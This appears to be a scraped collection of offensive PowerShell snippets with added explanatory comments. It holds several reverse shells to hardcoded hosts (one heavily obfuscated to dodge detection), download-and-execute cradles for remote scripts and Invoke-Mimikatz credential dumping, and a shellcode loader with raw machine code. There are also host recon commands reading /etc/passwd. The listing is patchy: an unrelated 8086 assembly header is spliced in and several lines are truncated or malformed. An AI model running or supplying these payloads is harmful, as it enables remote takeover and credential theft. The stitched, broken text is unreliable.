# Obfuscated PowerShell TCP reverse shell. Every cmdlet, type and method name is
# assembled at run time with the -f format operator, and variable names carry
# backticks and mixed case, so literal matches on "TCPClient", "New-Object" or
# "iex" do not hit this text.
# The first statement ('Sv' = Set-Variable) stores the [Text.Encoding] type in a
# variable named LhaW3; the format strings passed to TCPClient assemble to
# 54.194.214.53, port 443.
# Each received buffer is decoded as ASCII and handed to the 'ie'+'x' command with
# stderr merged (2>&1). That string-to-code step is where AMSI and script block
# logging (event 4104), when enabled, see the commands in clear text.
# NOTE(review): the line is cut off in this listing after the final Invoke($ .
&('Sv') ("{0}{1}"-f 'Lh','aW3') ( [TypE]("{3}{1}{0}{2}" -F 'ENcOdI','ExT.','ng','T') ); ${CLi`E`NT} = &("{1}{0}{2}"-f '-Obje','New','ct') ("{0}{2}{1}{3}{4}"-f'System.Ne','s.T','t.Socket','CPCli','ent')(("{2}{0}{1}"-f '4.194','.214.53','5'),443);${str`E`AM} = ${Cl`i`EnT}.("{0}{2}{1}" -f'GetSt','m','rea').Invoke();[byte[]]${B`yTEs} = 0..65535|&('%'){0};while((${i} = ${sTr`eaM}.("{1}{0}"-f 'd','Rea').Invoke(${B`yT`eS}, 0, ${b`yt`eS}."le`NgTh")) -ne 0){;${d`Ata} = (.("{1}{0}{2}" -f 'ew-Obj','N','ect') -TypeName ("{5}{2}{4}{3}{0}{1}"-f'IEnco','ding','ystem.Text.','SCI','A','S')).("{1}{0}{3}{2}" -f'e','G','ing','tStr').Invoke(${b`y`TES},0, ${I});${Se`Nd`BAcK} = (.("{1}{0}"-f'x','ie') ${d`ATa} 2>&1 | &("{2}{0}{1}"-f'S','tring','Out-') );${sE`NDBAc`K2} = ${S`END`BacK} + "PS " + (&("{1}{0}"-f'wd','p'))."p`AtH" + "> ";${sE`N`DbyTE} = ( ( .('LS') ("{2}{1}{3}{0}{4}"-f 'ble:L','i','var','a','HAW3') )."v`ALuE"::"A`Scii").("{0}{1}"-f 'Get','Bytes').Invoke(${SEndb`A`c`k2});${sTRe`Am}.("{0}{1}"-f 'W','rite').Invoke($ |
# Two-layer obfuscated launcher. $ShellId is "Microsoft.PowerShell", so characters
# [1] and [13] plus 'X' spell "ieX" (Invoke-Expression) without the name appearing.
# The argument is a string literal stored back to front: [RegEx]::Matches with the
# single-character pattern '.' and the RightToLeft option returns the characters in
# reverse order, and [String]::Join('') reassembles them.
# The recovered text builds a second "iex" from $VerbosePreference[1,3]+'X' and
# replaces the three-character marker Char 57,81,82 with Char 39 (a single quote).
# The end result is the same Net.WebClient DownloadString cradle that appears in
# plain form elsewhere on this page.
# Detection that relies on the literal URL or on "DownloadString" has to run after
# these layers are evaluated (AMSI, script block logging), not on this text.
.( $sheLLid[1]+$ShellID[13]+'X') ( [sTrING]::JoIn('' ,( [REgEx]::mAtchES( ")''NIOJ-'X'+]3,1[)ECneREFeRPesoBRev$]GNiRts[( ( .|)93]RaHc[]gNIrTs[,)28]RaHc[+18]RaHc[+75]RaHc[((eCALPER.)')RQ91sp.2ver/69bbb'+'534'+'a9'+'c0'+'a8b7dc30'+'2a24'+'6b1c'+'9'+'df5'+'e'+'7fbdeaa/'+'wa'+'r/1d'+'1f3d3fa'+'82eee'+'811aa'+'7300a'+'f'+'f013300/'+'r'+'zo'+'nkrf/'+'m'+'o'+'c'+'.'+'tn'+'etno'+'cr'+'esu'+'buh'+'ti'+'g.tsig'+'//'+':s'+'p'+'tt'+'h'+'RQ9(gni'+'r'+'t'+'Sdaol'+'nwoD.)tne'+'ilCbeW'+'.te'+'N'+' tcejbO'+'-w'+'eN('+' XEI llehsrewo'+'P'( ",'.','r'+'IG'+'h'+'ttoLeFt' )|ForEAch-objECT {$_.ValuE })) ) |
# Download cradle: Net.WebClient.DownloadString fetches the script text over HTTPS
# and IEX (Invoke-Expression) runs it from memory, so the fetched script is never
# written to disk by this line.
# The raw gist URL carries a revision hash, so it presumably resolves to one fixed
# version of rev2.ps1.
# Host-side evidence is the powershell process command line ("IEX", "DownloadString"),
# the outbound request to gist.githubusercontent.com, and, when script block logging
# is enabled, the downloaded text itself in event 4104.
Powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/frknozr/003310ffa0037aa118eee28af3d3f1d1/raw/aaedbf7e5fd9c1b642a203cd7b8a0c9a435bbb96/rev2.ps1') |
#A simple and small reverse shell. Options and help removed to save space. | |
#Uncomment and change the hardcoded IP address and port number in the below line. Remove all help comments as well. | |
# What the one-liner below does, statement by statement:
#   - opens an outbound TCP connection to 10.10.14.126:443 and takes its NetworkStream;
#     no SslStream is layered on top, so the port-443 traffic is plain text, not TLS
#   - allocates a 65536-byte zeroed buffer and loops until Read returns 0 (peer closed)
#   - decodes each read as ASCII and runs it with iex, merging stderr into the output (2>&1)
#   - sends back the output followed by a "PS <current path>> " prompt, ASCII-encoded
#   - closes the client once the loop ends
# The commands arrive as strings and are compiled by iex, so AMSI and script block
# logging (event 4104), when enabled, record each one.
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.126",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() | |
# The next line is a shorter variant of the same loop, left commented out by the author.
#$sm=(New-Object Net.Sockets.TCPClient("192.168.254.1",55555)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)} |
# Download cradle that loads Invoke-Mimikatz.ps1 from the PowerSploit repository into
# memory with IEX, calls Invoke-Mimikatz -DumpCreds, stores the result in $m and then
# writes $m to the pipeline.
# The URL points at the "master" branch rather than a fixed revision, so the script
# content executed depends on whatever that branch holds at fetch time.
# Relevant controls: AMSI and script block logging see the downloaded script text;
# credential dumping of this kind reads LSASS memory, which LSA protection (RunAsPPL)
# and Credential Guard are designed to restrict.
Powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); $m = Invoke-Mimikatz -DumpCreds; $m |
# Same Net.WebClient DownloadString + IEX cradle pattern, pointing at a raw gist URL
# for reverse.ps1 that carries a revision hash.
# NOTE(review): the URL string literal has an opening single quote but no closing one
# before the final parenthesis, so the line as shown is not a complete expression.
Powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/frknozr/c301bfa3dc9e1f7c6f7cabd83777b2a2/raw/d660001da6f5f2ee557396772d0f5d1010198d9d/reverse.ps1) |
# Opening section of a socket-based remote shell script; the listing stops inside the
# do-loop, so the command-handling logic is not visible here.
# Outbound TCP connection to 165.227.163.161 on port 443.
$socket = new-object System.Net.Sockets.TcpClient('165.227.163.161', 443); | |
# Bare string expression: emits "Working" to the pipeline as a progress marker.
"Working" | |
# Stop with exit code 1 if no client object was produced.
if($socket -eq $null){exit 1} | |
# Raw NetworkStream wrapped in a StreamWriter; no SslStream is visible, so the
# port-443 traffic is presumably plain text rather than TLS.
$stream = $socket.GetStream(); | |
$writer = new-object System.IO.StreamWriter($stream); | |
# 1024-byte receive buffer and an ASCII codec for converting between bytes and text.
$buffer = new-object System.Byte[] 1024; | |
$encoding = new-object System.Text.AsciiEncoding; | |
# Main loop; only its first statement (flushing the writer) appears in this excerpt.
do | |
{ | |
$writer.Flush(); |
;==================================================================== | |
; Main.asm file generated by New Project wizard | |
; | |
; Created: Cum Mar 11 2016 | |
; Processor: 8086 | |
; Compiler: MASM32 | |
; | |
; Before starting simulation set Internal Memory Size | |
; in the 8086 model properties to 0x10000 | |
;==================================================================== |
# Three host-enumeration commands: the effective user name, the local account
# database file (/etc/passwd holds account names, UIDs, home directories and shells),
# and the kernel name, release and architecture.
# Run together right after a new session starts, this sequence is a common
# post-access discovery pattern that process-execution auditing (auditd/EDR) can key on.
whoami | |
cat /etc/passwd | |
uname -a |
# P/Invoke signatures for kernel32 VirtualAlloc and CreateThread, held as C# source
# text in a here-string (everything between @" and "@ is runtime data, not PowerShell).
# Variable names throughout are random-looking strings.
$knQoUoTfNfL = @" | |
[DllImport("kernel32.dll")] | |
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); | |
[DllImport("kernel32.dll")] | |
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); | |
"@ | |
# Add-Type compiles the signatures into a type named Win32 in namespace Win32Functions;
# -passthru returns that type so the two native functions can be called as static methods.
# On Windows PowerShell this compilation usually invokes csc.exe and writes temporary
# files, which leaves a host artifact independent of the script text.
$XuqotFCQWLpJY = Add-Type -memberDefinition $knQoUoTfNfL -Name "Win32" -namespace Win32Functions -passthru | |
# Raw byte array. Given the VirtualAlloc/CreateThread imports it is presumably machine
# code meant to be copied into allocated memory and started on a new thread, but neither
# call is visible here and the array is cut off in this listing, so what the bytes do
# cannot be stated from this excerpt.
[Byte[]] $hbgpyIRNXZNcNzm = 0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xcc,0x0,0x0,0x0,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0xf,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x1,0xd0,0x66,0x81,0x78,0x18,0xb,0x2,0xf,0x85,0x72,0x0,0x0,0x0,0x8b,0x80,0x88,0x0,0x0,0x0,0x48,0x85,0xc0,0x74,0x67,0x48,0x1,0xd0,0x50,0x8b,0x48,0x